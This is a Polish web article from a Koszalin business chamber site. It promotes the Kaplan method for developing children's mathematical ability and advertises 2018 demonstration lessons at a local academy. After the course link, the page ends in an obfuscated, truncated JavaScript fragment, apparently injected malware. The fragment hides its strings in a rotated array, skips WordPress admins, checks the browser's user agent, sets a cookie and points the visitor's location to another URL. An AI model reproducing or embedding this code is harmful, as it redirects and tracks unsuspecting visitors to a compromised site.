Umiejętności matematyczne można rozwijać – U KAŻDEGO DZIECKA! | Północna Izba Gospodarcza w Koszalinie

Dzieci, które mają dobrze rozwinięte umiejętności matematyczne łatwiej uczą się również innych przedmiotów ścisłych, takich jak fizyka czy chemia.

Dlaczego tak się dzieje?

Naukowcy wyjaśniają, że istnieje zjawisko przeniesienia wprawy w wykonywaniu czynności już wyuczonej, na czynność uczoną aktualnie.

Efekt ten da się zauważyć różnych dziedzinach życia.

W sporcie można zaobserwować, że osoby dobrze jeżdżące na łyżwach, łatwo opanowują jazdę na rolkach czy na nartach, i odwrotnie.

Uczniowie osiągający dobre oceny z matematyki, są dobrzy i w fizyce i łatwo uczą się programowania komputerowego.

Podobnie jest też w przypadku osób uczących się języków obcych, u których obserwuje się, że każdego nowego języka uczą się szybciej.

Można stąd wnioskować, że ucząc się nabywamy wprawy w uczeniu się, czyli w miarę uczenia się uczymy się coraz lepiej i szybciej.

Oznacza to, że samo uczenie się jest pewną odrębną umiejętnością.

Tę koncepcję wykorzystują Robert i Ellen Kaplanowie, profesorowie matematyku z Harvardu, w swoich metodykach rozbudzania talentów matematycznych u dzieci.

Ich badania na temat zdolności matematycznych małych dzieci są jednoznaczne – dzieci mają talent matematyczny i u każdego dziecka można go rozbudzić.

Według tych wybitnych badaczy, dzieci tracą swoje uzdolnienia matematyczne, gdyż są w nieodpowiedni sposób uczone matematyki – szczególnie w pierwszych klasach szkoły podstawowej, kiedy są uczone przez nauczycieli nauczania początkowego, którzy nie są matematykami i często sami siebie uważają za matematycznie niezdolnych.

W Polsce również przeprowadzono badania nad zdolnościami matematycznymi małych dzieci.

Mimo, że w powszechnym mniemaniu uważa się, że uzdolnienia matematyczne są rzadkie, to wyniki badań prof. Gruszczyk – Kolczyńskiej, zrealizowane w ramach programu „Dziecięca matematyka” zadają temu kłam.

Wynika z nich, że więcej niż połowa dzieci przedszkolnych w Polsce charakteryzuje się zadziwiającą łatwością nabywania wiadomości i umiejętności matematycznych oraz matematycznym ukierunkowaniem umysłu.

Niestety, już po kilku miesiącach nauki szkolnej dzieci te przestają manifestować swoje uzdolnienia.

Dla profesor Gruszczyk – Kolczyńskiej wyniki oznaczają, że talenty matematyczne dzieci nie są umiejętnie rozwijane – i są dokładnie takie same wnioski jak wnioski Kaplanów.

Jednak Robert i Ellen Kaplanowie nie złożyli broni, lecz zaczęli aktywnie tworzyć metodyki nauczania matematyki dzieci i młodzieży, które pozwoliłby im na nowo rozbudzić matematyczne zdolności.

Opracowali metody rozwoju zdolności arytmetycznych dla dzieci, które stawiają swoje pierwsze kroki na ścieżce matematyki, oraz dla dzieci, które już zdążyły do matematyki się zrazić.

Efekty, które osiągają są oszałamiające.

Dzieci sześcioletnie operują olbrzymimi liczbami, sumują, odejmują, mnożą tysiące i miliony. Liczą ilości kombinacji, wykonują operacje na ułamkach – i to uwielbiają!

Dziesięciolatki rozwiązują układy równań z dwoma niewiadomymi, wykonują operacje na macierzach, liczą prawdopodobieństwo, same potrafią wyprowadzić wzór na pole figur i potrafią jeszcze wiele, wiele innych rzeczy.

Według Roberta i Ellen, każde dziecko może rozwinąć swoje matematyczne zdolności.

Metodycy Akademii Nauki przez dwa lata brali udział szkoleniach dla nauczycieli prowadzonych przez Roberta i Ellen Kaplanów na University of Notre Dame, w South Bend w USA.

Od 4 lat prowadzimy zajęcia rozwijające umiejętności matematyczne dzieci w Polsce pracując metodami Kaplanów.

W naszych programach wzięło udział blisko 2000 uczniów. Nasze doświadczenia potwierdzają wnioski Roberta i Ellen – każde dziecko może rozwinąć umiejętności matematyczne.

I nie ma znaczenia, czy dziecko uważa się za matematycznie zdolne czy nie.

W Akademii Nauki uczymy przez zabawę dzieci od 6 roku życia. Zapraszamy na lekcje pokazowe:
18.09.2018 oraz 21.09.2018 w godzinach 17.00 – 17.45. Liczba miejsc ograniczona konieczna rejestracja telefoniczna pod numerem – 733 278 182
Więcej informacji na temat kursów matematycznych – https://www.akademianauki-koszalin.pl/Oferta 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m